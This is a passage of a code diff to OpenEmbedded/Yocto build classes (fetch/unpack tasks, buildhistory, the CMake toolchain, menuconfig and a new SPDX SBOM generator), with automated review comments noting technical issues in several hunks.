138 if "ccache" in srctool: 142 if os.path.islink(srctool) and os.path.basename(os.readlink(srctool)) == 'ccache':
139 srctool = bb.utils.which(path, tool, executable=True, direction=1) 143 srctool = bb.utils.which(path, tool, executable=True, direction=1)
140 if srctool: 144 if srctool:
141 os.symlink(srctool, desttool) 145 os.symlink(srctool, desttool)
@@ -153,14 +157,14 @@ do_fetch[vardeps] += "SRCREV"
153python base_do_fetch() { 157python base_do_fetch() {
154 158
155 src_uri = (d.getVar('SRC_URI') or "").split() 159 src_uri = (d.getVar('SRC_URI') or "").split()
156 if len(src_uri) == 0: 160 if not src_uri:
157 return 161 return
158 162
159 try: 163 try:
160 fetcher = bb.fetch2.Fetch(src_uri, d) 164 fetcher = bb.fetch2.Fetch(src_uri, d)
161 fetcher.download() 165 fetcher.download()
162 except bb.fetch2.BBFetchException as e: 166 except bb.fetch2.BBFetchException as e:
163 bb.fatal(str(e)) 167 bb.fatal("Bitbake Fetcher Error: " + repr(e))
164} 168}
165 169
166addtask unpack after do_fetch 170addtask unpack after do_fetch
@@ -170,14 +174,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o
170 174
171python base_do_unpack() { 175python base_do_unpack() {
172 src_uri = (d.getVar('SRC_URI') or "").split() 176 src_uri = (d.getVar('SRC_URI') or "").split()
173 if len(src_uri) == 0: 177 if not src_uri:
174 return 178 return
175 179
176 try: 180 try:
177 fetcher = bb.fetch2.Fetch(src_uri, d) 181 fetcher = bb.fetch2.Fetch(src_uri, d)
178 fetcher.unpack(d.getVar('WORKDIR')) 182 fetcher.unpack(d.getVar('WORKDIR'))
179 except bb.fetch2.BBFetchException as e: 183 except bb.fetch2.BBFetchException as e:
180 bb.fatal(str(e)) 184 bb.fatal("Bitbake Fetcher Error: " + repr(e))
181} 185}
182 186
183def get_layers_branch_rev(d): 187def get_layers_branch_rev(d):
@@ -688,7 +692,7 @@ python () {
688 if os.path.basename(p) == machine and os.path.isdir(p): 692 if os.path.basename(p) == machine and os.path.isdir(p):
689 paths.append(p) 693 paths.append(p)
690 694
691 if len(paths) != 0: 695 if paths:
692 for s in srcuri.split(): 696 for s in srcuri.split():
693 if not s.startswith("file://"): 697 if not s.startswith("file://"):
694 continue 698 continue
@@ -721,7 +725,7 @@ do_cleansstate[nostamp] = "1"
721 725
722python do_cleanall() { 726python do_cleanall() {
723 src_uri = (d.getVar('SRC_URI') or "").split() 727 src_uri = (d.getVar('SRC_URI') or "").split()
724 if len(src_uri) == 0: 728 if not src_uri:
725 return 729 return
726 730
727 try: 731 try:
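Review bot: In `setup_hosttools_dir` the new loop rewrites PATH with `path.replace(p, "/ignoreme")`, which is a substring replacement over the whole PATH string rather than a change to one entry. With a constructed PATH holding both `/work/poky/scripts` and `/work/poky/scripts/extra`, the second entry becomes `/ignoreme/extra`, and any unrelated directory whose name happens to end in `/scripts` is masked too. Both effects change which host binary each hosttools symlink ends up pointing at. Filtering whole entries keeps the intent without the side effects: `path = ":".join(p for p in path.split(":") if not p.rstrip("/").endswith("/scripts"))`. Comparing each entry against the layer's actual scripts directory would be narrower still; the function begins and ends outside this hunk, so how the result is used afterwards is not fully visible here.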
diff --git a/meta/classes/bin_package.bbclass b/meta/classes/bin_package.bbclass
index cbc9b1fa13..c1954243ee 100644
--- a/meta/classes/bin_package.bbclass
+++ b/meta/classes/bin_package.bbclass
@@ -30,8 +30,9 @@ bin_package_do_install () {
30 bbfatal bin_package has nothing to install. Be sure the SRC_URI unpacks into S. 30 bbfatal bin_package has nothing to install. Be sure the SRC_URI unpacks into S.
31 fi 31 fi
32 cd ${S} 32 cd ${S}
33 install -d ${D}${base_prefix}
33 tar --no-same-owner --exclude='./patches' --exclude='./.pc' -cpf - . \ 34 tar --no-same-owner --exclude='./patches' --exclude='./.pc' -cpf - . \
34 | tar --no-same-owner -xpf - -C ${D} 35 | tar --no-same-owner -xpf - -C ${D}${base_prefix}
35} 36}
36 37
37FILES_${PN} = "/" 38FILES_${PN} = "/"
diff --git a/meta/classes/buildhistory.bbclass b/meta/classes/buildhistory.bbclass
index 8a1359acbe..6a1a20653a 100644
--- a/meta/classes/buildhistory.bbclass
+++ b/meta/classes/buildhistory.bbclass
@@ -671,13 +671,16 @@ IMAGE_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_imageinfo"
671POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_list_installed_sdk_target;" 671POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_list_installed_sdk_target;"
672POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_get_sdk_installed_target;" 672POPULATE_SDK_POST_TARGET_COMMAND_append = " buildhistory_get_sdk_installed_target;"
673POPULATE_SDK_POST_TARGET_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_target;| buildhistory_get_sdk_installed_target;" 673POPULATE_SDK_POST_TARGET_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_target;| buildhistory_get_sdk_installed_target;"
674POPULATE_SDK_POST_TARGET_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_target buildhistory_get_sdk_installed_target"
674 675
675POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_list_installed_sdk_host;" 676POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_list_installed_sdk_host;"
676POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_get_sdk_installed_host;" 677POPULATE_SDK_POST_HOST_COMMAND_append = " buildhistory_get_sdk_installed_host;"
677POPULATE_SDK_POST_HOST_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_host;| buildhistory_get_sdk_installed_host;" 678POPULATE_SDK_POST_HOST_COMMAND[vardepvalueexclude] .= "| buildhistory_list_installed_sdk_host;| buildhistory_get_sdk_installed_host;"
679POPULATE_SDK_POST_HOST_COMMAND[vardepsexclude] += "buildhistory_list_installed_sdk_host buildhistory_get_sdk_installed_host"
678 680
679SDK_POSTPROCESS_COMMAND_append = " buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; " 681SDK_POSTPROCESS_COMMAND_append = " buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
680SDK_POSTPROCESS_COMMAND[vardepvalueexclude] .= "| buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; " 682SDK_POSTPROCESS_COMMAND[vardepvalueexclude] .= "| buildhistory_get_sdkinfo ; buildhistory_get_extra_sdkinfo; "
683SDK_POSTPROCESS_COMMAND[vardepsexclude] += "buildhistory_get_sdkinfo buildhistory_get_extra_sdkinfo"
681 684
682python buildhistory_write_sigs() { 685python buildhistory_write_sigs() {
683 if not "task" in (d.getVar('BUILDHISTORY_FEATURES') or "").split(): 686 if not "task" in (d.getVar('BUILDHISTORY_FEATURES') or "").split():
@@ -862,6 +865,7 @@ python buildhistory_eventhandler() {
862 if os.path.isdir(olddir): 865 if os.path.isdir(olddir):
863 shutil.rmtree(olddir) 866 shutil.rmtree(olddir)
864 rootdir = e.data.getVar("BUILDHISTORY_DIR") 867 rootdir = e.data.getVar("BUILDHISTORY_DIR")
868 bb.utils.mkdirhier(rootdir)
865 entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ] 869 entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ]
866 bb.utils.mkdirhier(olddir) 870 bb.utils.mkdirhier(olddir)
867 for entry in entries: 871 for entry in entries:
@@ -950,23 +954,19 @@ def write_latest_srcrev(d, pkghistdir):
950 value = value.replace('"', '').strip() 954 value = value.replace('"', '').strip()
951 old_tag_srcrevs[key] = value 955 old_tag_srcrevs[key] = value
952 with open(srcrevfile, 'w') as f: 956 with open(srcrevfile, 'w') as f:
953 orig_srcrev = d.getVar('SRCREV', False) or 'INVALID' 957 for name, srcrev in sorted(srcrevs.items()):
954 if orig_srcrev != 'INVALID': 958 suffix = "_" + name
955 f.write('# SRCREV = "%s"\n' % orig_srcrev) 959 if name == "default":
956 if len(srcrevs) > 1: 960 suffix = ""
957 for name, srcrev in sorted(srcrevs.items()): 961 orig_srcrev = d.getVar('SRCREV%s' % suffix, False)
958 orig_srcrev = d.getVar('SRCREV_%s' % name, False) 962 if orig_srcrev:
959 if orig_srcrev: 963 f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev))
960 f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev)) 964 f.write('SRCREV%s = "%s"\n' % (suffix, srcrev))
961 f.write('SRCREV_%s = "%s"\n' % (name, srcrev)) 965 for name, srcrev in sorted(tag_srcrevs.items()):
962 else: 966 f.write('# tag_%s = "%s"\n' % (name, srcrev))
963 f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values()))) 967 if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
964 if len(tag_srcrevs) > 0: 968 pkg = d.getVar('PN')
965 for name, srcrev in sorted(tag_srcrevs.items()): 969 bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
966 f.write('# tag_%s = "%s"\n' % (name, srcrev))
967 if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev:
968 pkg = d.getVar('PN')
969 bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev))
970 970
971 else: 971 else:
972 if os.path.exists(srcrevfile): 972 if os.path.exists(srcrevfile):
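Review bot: The rewritten loop in `write_latest_srcrev` emits the `# SRCREV… = "…"` comment for any non-empty `d.getVar('SRCREV%s' % suffix, False)`, whereas the removed code explicitly skipped the literal `'INVALID'`. If the datastore default for `SRCREV` is that placeholder (not visible in this hunk), a recipe whose `default` revision was supplied through another variable would now get `# SRCREV = "INVALID"` written into the srcrev file; `if orig_srcrev and orig_srcrev != 'INVALID':` keeps the old filter. A recipe with a single named revision is also now recorded as `SRCREV_<name>` rather than plain `SRCREV`, so any tooling that reads this file back should be checked against both forms. The function body extends beyond the hunk.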
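diff --git a/meta/classes/cmake.bbclass b/meta/classes/cmake.bbclass
index 8243f7ce8c..af6a8c4395 100644
--- a/meta/classes/cmake.bbclass
+++ b/meta/classes/cmake.bbclass
@@ -102,7 +102,8 @@ set( CMAKE_CXX_COMPILER ${OECMAKE_CXX_COMPILER} )
 set( CMAKE_C_COMPILER_LAUNCHER ${OECMAKE_C_COMPILER_LAUNCHER} )
 set( CMAKE_CXX_COMPILER_LAUNCHER ${OECMAKE_CXX_COMPILER_LAUNCHER} )
 set( CMAKE_ASM_COMPILER ${OECMAKE_C_COMPILER} )
-set( CMAKE_AR ${OECMAKE_AR} CACHE FILEPATH "Archiver" )
+find_program( CMAKE_AR ${OECMAKE_AR} DOC "Archiver" REQUIRED )
+
 set( CMAKE_C_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "CFLAGS" )
 set( CMAKE_CXX_FLAGS "${OECMAKE_CXX_FLAGS}" CACHE STRING "CXXFLAGS" )
 set( CMAKE_ASM_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "ASM FLAGS" )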
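Review bot: `find_program( CMAKE_AR ${OECMAKE_AR} DOC "Archiver" REQUIRED )` relies on the `REQUIRED` keyword, which `find_program` only understands from CMake 3.18 onwards. An older CMake reading this generated toolchain file does not treat it as a keyword, so a missing archiver is not reported at this point. The line also replaces a fixed value with a search, so the `ar` that gets picked now depends on the program search paths in effect when the toolchain file is read. An explicit check after the call behaves the same on every version: `if( NOT CMAKE_AR )`, then `message( FATAL_ERROR "${OECMAKE_AR} not found" )`, then `endif()`.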
diff --git a/meta/classes/cml1.bbclass b/meta/classes/cml1.bbclass
index 8ab240589a..46a19fce32 100644
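--- a/meta/classes/cml1.bbclass
+++ b/meta/classes/cml1.bbclass
@@ -36,6 +36,14 @@ python do_menuconfig() {
 except OSError:
 mtime = 0
 
+# setup native pkg-config variables (kconfig scripts call pkg-config directly, cannot generically be overriden to pkg-config-native)
+d.setVar("PKG_CONFIG_DIR", "${STAGING_DIR_NATIVE}${libdir_native}/pkgconfig")
+d.setVar("PKG_CONFIG_PATH", "${PKG_CONFIG_DIR}:${STAGING_DATADIR_NATIVE}/pkgconfig")
+d.setVar("PKG_CONFIG_LIBDIR", "${PKG_CONFIG_DIR}")
+d.setVarFlag("PKG_CONFIG_SYSROOT_DIR", "unexport", "1")
+# ensure that environment variables are overwritten with this tasks 'd' values
+d.appendVar("OE_TERMINAL_EXPORTS", " PKG_CONFIG_DIR PKG_CONFIG_PATH PKG_CONFIG_LIBDIR PKG_CONFIG_SYSROOT_DIR")
+
 oe_terminal("sh -c \"make %s; if [ \\$? -ne 0 ]; then echo 'Command failed.'; printf 'Press any key to continue... '; read r; fi\"" % d.getVar('KCONFIG_CONFIG_COMMAND'),
 d.getVar('PN') + ' Configuration', d)
 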
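Review bot: `PKG_CONFIG_SYSROOT_DIR` is flagged `unexport` on new line 43 and then listed in `OE_TERMINAL_EXPORTS` on new line 45, and neither comment says which of the two decides what the terminal's environment ends up holding. If the intent is that kconfig's direct `pkg-config` calls run without a sysroot prefix, say so next to the flag, for example `# listed in OE_TERMINAL_EXPORTS so the terminal does not inherit a target PKG_CONFIG_SYSROOT_DIR from the caller`, after confirming how the export list treats an unexported variable. The comment on new line 39 also misspells `overridden`. do_menuconfig begins before this hunk and continues after it.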
diff --git a/meta/classes/create-spdx-2.2.bbclass b/meta/classes/create-spdx-2.2.bbclass
new file mode 100644
index 0000000000..42b693d586
--- /dev/null
+++ b/meta/classes/create-spdx-2.2.bbclass
@@ -0,0 +1,1067 @@
1#
2# Copyright OpenEmbedded Contributors
3#
4# SPDX-License-Identifier: GPL-2.0-only
5#
6
7DEPLOY_DIR_SPDX ??= "${DEPLOY_DIR}/spdx/${MACHINE}"
8
9# The product name that the CVE database uses. Defaults to BPN, but may need to
10# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
11CVE_PRODUCT ??= "${BPN}"
12CVE_VERSION ??= "${PV}"
13
14SPDXDIR ??= "${WORKDIR}/spdx"
15SPDXDEPLOY = "${SPDXDIR}/deploy"
16SPDXWORK = "${SPDXDIR}/work"
17SPDXIMAGEWORK = "${SPDXDIR}/image-work"
18SPDXSDKWORK = "${SPDXDIR}/sdk-work"
19
20SPDX_TOOL_NAME ??= "oe-spdx-creator"
21SPDX_TOOL_VERSION ??= "1.0"
22
23SPDXRUNTIMEDEPLOY = "${SPDXDIR}/runtime-deploy"
24
25SPDX_INCLUDE_SOURCES ??= "0"
26SPDX_ARCHIVE_SOURCES ??= "0"
27SPDX_ARCHIVE_PACKAGED ??= "0"
28
29SPDX_UUID_NAMESPACE ??= "sbom.openembedded.org"
30SPDX_NAMESPACE_PREFIX ??= "http://spdx.org/spdxdoc"
31SPDX_PRETTY ??= "0"
32
33SPDX_LICENSES ??= "${COREBASE}/meta/files/spdx-licenses.json"
34
35SPDX_CUSTOM_ANNOTATION_VARS ??= ""
36
37SPDX_ORG ??= "OpenEmbedded ()"
38SPDX_SUPPLIER ??= "Organization: ${SPDX_ORG}"
39SPDX_SUPPLIER[doc] = "The SPDX PackageSupplier field for SPDX packages created from \
40 this recipe. For SPDX documents create using this class during the build, this \
41 is the contact information for the person or organization who is doing the \
42 build."
43
44def extract_licenses(filename):
45 import re
46
47 lic_regex = re.compile(rb'^\W*SPDX-License-Identifier:\s*([ \w\d.()+-]+?)(?:\s+\W*)?$', re.MULTILINE)
48
49 try:
50 with open(filename, 'rb') as f:
51 size = min(15000, os.stat(filename).st_size)
52 txt = f.read(size)
53 licenses = re.findall(lic_regex, txt)
54 if licenses:
55 ascii_licenses = [lic.decode('ascii') for lic in licenses]
56 return ascii_licenses
57 except Exception as e:
58 bb.warn(f"Exception reading {filename}: {e}")
59 return None
60
61def get_doc_namespace(d, doc):
62 import uuid
63 namespace_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, d.getVar("SPDX_UUID_NAMESPACE"))
64 return "%s/%s-%s" % (d.getVar("SPDX_NAMESPACE_PREFIX"), doc.name, str(uuid.uuid5(namespace_uuid, doc.name)))
65
66def create_annotation(d, comment):
67 from datetime import datetime, timezone
68
69 creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
70 annotation = oe.spdx.SPDXAnnotation()
71 annotation.annotationDate = creation_time
72 annotation.annotationType = "OTHER"
73 annotation.annotator = "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION"))
74 annotation.comment = comment
75 return annotation
76
77def recipe_spdx_is_native(d, recipe):
78 return any(a.annotationType == "OTHER" and
79 a.annotator == "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION")) and
80 a.comment == "isNative" for a in recipe.annotations)
81
82def is_work_shared_spdx(d):
83 return bb.data.inherits_class('kernel', d) or ('work-shared' in d.getVar('WORKDIR'))
84
85def get_json_indent(d):
86 if d.getVar("SPDX_PRETTY") == "1":
87 return 2
88 return None
89
90python() {
91 import json
92 if d.getVar("SPDX_LICENSE_DATA"):
93 return
94
95 with open(d.getVar("SPDX_LICENSES"), "r") as f:
96 data = json.load(f)
97 # Transform the license array to a dictionary
98 data["licenses"] = {l["licenseId"]: l for l in data["licenses"]}
99 d.setVar("SPDX_LICENSE_DATA", data)
100}
101
102def convert_license_to_spdx(lic, document, d, existing={}):
103 from pathlib import Path
104 import oe.spdx
105
106 license_data = d.getVar("SPDX_LICENSE_DATA")
107 extracted = {}
108
109 def add_extracted_license(ident, name):
110 nonlocal document
111
112 if name in extracted:
113 return
114
115 extracted_info = oe.spdx.SPDXExtractedLicensingInfo()
116 extracted_info.name = name
117 extracted_info.licenseId = ident
118 extracted_info.extractedText = None
119
120 if name == "PD":
121 # Special-case this.
122 extracted_info.extractedText = "Software released to the public domain"
123 else:
124 # Seach for the license in COMMON_LICENSE_DIR and LICENSE_PATH
125 for directory in [d.getVar('COMMON_LICENSE_DIR')] + (d.getVar('LICENSE_PATH') or '').split():
126 try:
127 with (Path(directory) / name).open(errors="replace") as f:
128 extracted_info.extractedText = f.read()
129 break
130 except FileNotFoundError:
131 pass
132 if extracted_info.extractedText is None:
133 # If it's not SPDX or PD, then NO_GENERIC_LICENSE must be set
134 filename = d.getVarFlag('NO_GENERIC_LICENSE', name)
135 if filename:
136 filename = d.expand("${S}/" + filename)
137 with open(filename, errors="replace") as f:
138 extracted_info.extractedText = f.read()
139 else:
140 bb.error("Cannot find any text for license %s" % name)
141
142 extracted[name] = extracted_info
143 document.hasExtractedLicensingInfos.append(extracted_info)
144
145 def convert(l):
146 if l == "(" or l == ")":
147 return l
148
149 if l == "&":
150 return "AND"
151
152 if l == "|":
153 return "OR"
154
155 if l == "CLOSED":
156 return "NONE"
157
158 spdx_license = d.getVarFlag("SPDXLICENSEMAP", l) or l
159 if spdx_license in license_data["licenses"]:
160 return spdx_license
161
162 try:
163 spdx_license = existing[l]
164 except KeyError:
165 spdx_license = "LicenseRef-" + l
166 add_extracted_license(spdx_license, l)
167
168 return spdx_license
169
170 lic_split = lic.replace("(", " ( ").replace(")", " ) ").split()
171
172 return ' '.join(convert(l) for l in lic_split)
173
174def process_sources(d):
175 pn = d.getVar('PN')
176 assume_provided = (d.getVar("ASSUME_PROVIDED") or "").split()
177 if pn in assume_provided:
178 for p in d.getVar("PROVIDES").split():
179 if p != pn:
180 pn = p
181 break
182
183 # glibc-locale: do_fetch, do_unpack and do_patch tasks have been deleted,
184 # so avoid archiving source here.
185 if pn.startswith('glibc-locale'):
186 return False
187 if d.getVar('PN') == "libtool-cross":
188 return False
189 if d.getVar('PN') == "libgcc-initial":
190 return False
191 if d.getVar('PN') == "shadow-sysroot":
192 return False
193
194 # We just archive gcc-source for all the gcc related recipes
195 if d.getVar('BPN') in ['gcc', 'libgcc']:
196 bb.debug(1, 'spdx: There is bug in scan of %s is, do nothing' % pn)
197 return False
198
199 return True
200
201
202def add_package_files(d, doc, spdx_pkg, topdir, get_spdxid, get_types, *, archive=None, ignore_dirs=[], ignore_top_level_dirs=[]):
203 from pathlib import Path
204 import oe.spdx
205 import hashlib
206
207 source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
208 if source_date_epoch:
209 source_date_epoch = int(source_date_epoch)
210
211 sha1s = []
212 spdx_files = []
213
214 file_counter = 1
215 for subdir, dirs, files in os.walk(topdir):
216 dirs[:] = [d for d in dirs if d not in ignore_dirs]
217 if subdir == str(topdir):
218 dirs[:] = [d for d in dirs if d not in ignore_top_level_dirs]
219
220 for file in files:
221 filepath = Path(subdir) / file
222 filename = str(filepath.relative_to(topdir))
223
224 if not filepath.is_symlink() and filepath.is_file():
225 spdx_file = oe.spdx.SPDXFile()
226 spdx_file.SPDXID = get_spdxid(file_counter)
227 for t in get_types(filepath):
228 spdx_file.fileTypes.append(t)
229 spdx_file.fileName = filename
230
231 if archive is not None:
232 with filepath.open("rb") as f:
233 info = archive.gettarinfo(fileobj=f)
234 info.name = filename
235 info.uid = 0
236 info.gid = 0
237 info.uname = "root"
238 info.gname = "root"
239
240 if source_date_epoch is not None and info.mtime > source_date_epoch:
241 info.mtime = source_date_epoch
242
243 archive.addfile(info, f)
244
245 sha1 = bb.utils.sha1_file(filepath)
246 sha1s.append(sha1)
247 spdx_file.checksums.append(oe.spdx.SPDXChecksum(
248 algorithm="SHA1",
249 checksumValue=sha1,
250 ))
251 spdx_file.checksums.append(oe.spdx.SPDXChecksum(
252 algorithm="SHA256",
253 checksumValue=bb.utils.sha256_file(filepath),
254 ))
255
256 if "SOURCE" in spdx_file.fileTypes:
257 extracted_lics = extract_licenses(filepath)
258 if extracted_lics:
259 spdx_file.licenseInfoInFiles = extracted_lics
260
261 doc.files.append(spdx_file)
262 doc.add_relationship(spdx_pkg, "CONTAINS", spdx_file)
263 spdx_pkg.hasFiles.append(spdx_file.SPDXID)
264
265 spdx_files.append(spdx_file)
266
267 file_counter += 1
268
269 sha1s.sort()
270 verifier = hashlib.sha1()
271 for v in sha1s:
272 verifier.update(v.encode("utf-8"))
273 spdx_pkg.packageVerificationCode.packageVerificationCodeValue = verifier.hexdigest()
274
275 return spdx_files
276
277
278def add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources):
279 from pathlib import Path
280 import hashlib
281 import oe.packagedata
282 import oe.spdx
283
284 debug_search_paths = [
285 Path(d.getVar('PKGD')),
286 Path(d.getVar('STAGING_DIR_TARGET')),
287 Path(d.getVar('STAGING_DIR_NATIVE')),
288 Path(d.getVar('STAGING_KERNEL_DIR')),
289 ]
290
291 pkg_data = oe.packagedata.read_subpkgdata_extended(package, d)
292
293 if pkg_data is None:
294 return
295
296 for file_path, file_data in pkg_data["files_info"].items():
297 if not "debugsrc" in file_data:
298 continue
299
300 for pkg_file in package_files:
301 if file_path.lstrip("/") == pkg_file.fileName.lstrip("/"):
302 break
303 else:
304 bb.fatal("No package file found for %s" % str(file_path))
305 continue
306
307 for debugsrc in file_data["debugsrc"]:
308 ref_id = "NOASSERTION"
309 for search in debug_search_paths:
310 if debugsrc.startswith("/usr/src/kernel"):
311 debugsrc_path = search / debugsrc.replace('/usr/src/kernel/', '')
312 else:
313 debugsrc_path = search / debugsrc.lstrip("/")
314 if not debugsrc_path.exists():
315 continue
316
317 file_sha256 = bb.utils.sha256_file(debugsrc_path)
318
319 if file_sha256 in sources:
320 source_file = sources[file_sha256]
321
322 doc_ref = package_doc.find_external_document_ref(source_file.doc.documentNamespace)
323 if doc_ref is None:
324 doc_ref = oe.spdx.SPDXExternalDocumentRef()
325 doc_ref.externalDocumentId = "DocumentRef-dependency-" + source_file.doc.name
326 doc_ref.spdxDocument = source_file.doc.documentNamespace
327 doc_ref.checksum.algorithm = "SHA1"
328 doc_ref.checksum.checksumValue = source_file.doc_sha1
329 package_doc.externalDocumentRefs.append(doc_ref)
330
331 ref_id = "%s:%s" % (doc_ref.externalDocumentId, source_file.file.SPDXID)
332 else:
333 bb.debug(1, "Debug source %s with SHA256 %s not found in any dependency" % (str(debugsrc_path), file_sha256))
334 break
335 else:
336 bb.debug(1, "Debug source %s not found" % debugsrc)
337
338 package_doc.add_relationship(pkg_file, "GENERATED_FROM", ref_id, comment=debugsrc)
339
340def collect_dep_recipes(d, doc, spdx_recipe):
341 from pathlib import Path
342 import oe.sbom
343 import oe.spdx
344
345 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
346
347 dep_recipes = []
348 taskdepdata = d.getVar("BB_TASKDEPDATA", False)
349 deps = sorted(set(
350 dep[0] for dep in taskdepdata.values() if
351 dep[1] == "do_create_spdx" and dep[0] != d.getVar("PN")
352 ))
353 for dep_pn in deps:
354 dep_recipe_path = deploy_dir_spdx / "recipes" / ("recipe-%s.spdx.json" % dep_pn)
355
356 spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_recipe_path)
357
358 for pkg in spdx_dep_doc.packages:
359 if pkg.name == dep_pn:
360 spdx_dep_recipe = pkg
361 break
362 else:
363 continue
364
365 dep_recipes.append(oe.sbom.DepRecipe(spdx_dep_doc, spdx_dep_sha1, spdx_dep_recipe))
366
367 dep_recipe_ref = oe.spdx.SPDXExternalDocumentRef()
368 dep_recipe_ref.externalDocumentId = "DocumentRef-dependency-" + spdx_dep_doc.name
369 dep_recipe_ref.spdxDocument = spdx_dep_doc.documentNamespace
370 dep_recipe_ref.checksum.algorithm = "SHA1"
371 dep_recipe_ref.checksum.checksumValue = spdx_dep_sha1
372
373 doc.externalDocumentRefs.append(dep_recipe_ref)
374
375 doc.add_relationship(
376 "%s:%s" % (dep_recipe_ref.externalDocumentId, spdx_dep_recipe.SPDXID),
377 "BUILD_DEPENDENCY_OF",
378 spdx_recipe
379 )
380
381 return dep_recipes
382
383collect_dep_recipes[vardepsexclude] += "BB_TASKDEPDATA"
384collect_dep_recipes[vardeps] += "DEPENDS"
385
386def collect_dep_sources(d, dep_recipes):
387 import oe.sbom
388
389 sources = {}
390 for dep in dep_recipes:
391 # Don't collect sources from native recipes as they
392 # match non-native sources also.
393 if recipe_spdx_is_native(d, dep.recipe):
394 continue
395 recipe_files = set(dep.recipe.hasFiles)
396
397 for spdx_file in dep.doc.files:
398 if spdx_file.SPDXID not in recipe_files:
399 continue
400
401 if "SOURCE" in spdx_file.fileTypes:
402 for checksum in spdx_file.checksums:
403 if checksum.algorithm == "SHA256":
404 sources[checksum.checksumValue] = oe.sbom.DepSource(dep.doc, dep.doc_sha1, dep.recipe, spdx_file)
405 break
406
407 return sources
408
409def add_download_packages(d, doc, recipe):
410 import os.path
411 from bb.fetch2 import decodeurl, CHECKSUM_LIST
412 import bb.process
413 import oe.spdx
414 import oe.sbom
415
416 for download_idx, src_uri in enumerate(d.getVar('SRC_URI').split()):
417 f = bb.fetch2.FetchData(src_uri, d)
418
419 for name in f.names:
420 package = oe.spdx.SPDXPackage()
421 package.name = "%s-source-%d" % (d.getVar("PN"), download_idx + 1)
422 package.SPDXID = oe.sbom.get_download_spdxid(d, download_idx + 1)
423
424 if f.type == "file":
425 continue
426
427 uri = f.type
428 proto = getattr(f, "proto", None)
429 if proto is not None:
430 uri = uri + "+" + proto
431 uri = uri + "://" + f.host + f.path
432
433 if f.method.supports_srcrev():
434 uri = uri + "@" + f.revisions[name]
435
436 if f.method.supports_checksum(f):
437 for checksum_id in CHECKSUM_LIST:
438 if checksum_id.upper() not in oe.spdx.SPDXPackage.ALLOWED_CHECKSUMS:
439 continue
440
441 expected_checksum = getattr(f, "%s_expected" % checksum_id)
442 if expected_checksum is None:
443 continue
444
445 c = oe.spdx.SPDXChecksum()
446 c.algorithm = checksum_id.upper()
447 c.checksumValue = expected_checksum
448 package.checksums.append(c)
449
450 package.downloadLocation = uri
451 doc.packages.append(package)
452 doc.add_relationship(doc, "DESCRIBES", package)
453 # In the future, we might be able to do more fancy dependencies,
454 # but this should be sufficient for now
455 doc.add_relationship(package, "BUILD_DEPENDENCY_OF", recipe)
456
457python do_create_spdx() {
458 from datetime import datetime, timezone
459 import oe.sbom
460 import oe.spdx
461 import uuid
462 from pathlib import Path
463 from contextlib import contextmanager
464 import oe.cve_check
465
466 @contextmanager
467 def optional_tarfile(name, guard, mode="w"):
468 import tarfile
469 import gzip
470
471 if guard:
472 name.parent.mkdir(parents=True, exist_ok=True)
473 with gzip.open(name, mode=mode + "b") as f:
474 with tarfile.open(fileobj=f, mode=mode + "|") as tf:
475 yield tf
476 else:
477 yield None
478
479
480 deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
481 spdx_workdir = Path(d.getVar("SPDXWORK"))
482 include_sources = d.getVar("SPDX_INCLUDE_SOURCES") == "1"
483 archive_sources = d.getVar("SPDX_ARCHIVE_SOURCES") == "1"
484 archive_packaged = d.getVar("SPDX_ARCHIVE_PACKAGED") == "1"
485
486 creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
487
488 doc = oe.spdx.SPDXDocument()
489
490 doc.name = "recipe-" + d.getVar("PN")
491 doc.documentNamespace = get_doc_namespace(d, doc)
492 doc.creationInfo.created = creation_time
493 doc.creationInfo.comment = "This document was created by analyzing recipe files during the build."
494 doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
495 doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
496 doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
497 doc.creationInfo.creators.append("Person: N/A ()")
498
499 recipe = oe.spdx.SPDXPackage()
500 recipe.name = d.getVar("PN")
501 recipe.versionInfo = d.getVar("PV")
502 recipe.SPDXID = oe.sbom.get_recipe_spdxid(d)
503 recipe.supplier = d.getVar("SPDX_SUPPLIER")
